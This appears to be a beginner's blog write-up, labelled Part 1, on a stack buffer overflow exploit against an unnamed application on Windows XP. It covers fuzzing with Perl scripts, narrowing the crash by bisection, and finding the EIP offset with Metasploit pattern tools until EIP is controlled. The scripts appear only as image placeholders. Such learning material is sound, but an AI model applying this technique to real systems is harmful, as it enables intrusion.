exploit work in my victim PART 1

why i test this, cause it not work in my victim

os :

—————————-

backtrack 5 R2

window xp (CHINESE)

———————-

first ,i will write a perl script to check the vuln app crash

this way, i set the junk=10000,like fellow
2


1

when i set junk=20000, the app still not crash , this is show in the immunity debugger
3

now , i set junk=30000
4


5


6

i can see that the “EIP 41414141” ,and the app crash and disapper.

现在我知道了EIP在于20000与30000 之间,现在我再进一步来缩小小范围 , 用二分法吧 ,就是25000 A+5000 B ,如以下

EIP 41414141(AAAA) ------------- between 20000 and 25000
EIP 42424242 (BBBB) ———————- Between 25000 and 30000

this is the perl script ,like fellow

7

i put it in immunity debugger , like fellow

8

i can see that the “EIP 42424242” , so it mean
EIP 42424242 (BBBB) ———————- Between 25000 and 30000
and given that EIP was overwritten before the end of the 30000 character buffer

i have overwritten EIP with BBBB and i can also see my buffer in ESP

now , i will find out the exact location in my buffer that overwrites EIP , metasploit is my best choses

this tool help me to calculating the offset , like fellow
9

copy the data to perl script

10

run app in immunity debugger , like fellow

11

12

i can see that “EIP 6A42346A”

now i need metasploit tool to calculate the exact length of the buffer before writing into EIP , like fellow

13

ok , 1063 ——– this is the buffer length needed to overwrite EIP.

so ,i create a file with 25000+1063 A’s (26063),and then add 4 B’s

I also add some C’s after overwriting EIP

here is the perl
15

run it in immunity debugger , like fellow

14

i can see that ESP is full of CCCC
EIP contains BBBB,which is exactly what we wanted .so now we control EIP.On top of that ,ESP points to our buffer(C’s)

此条目发表在Uncategorized分类目录。将固定链接加入收藏夹。

评论功能已关闭。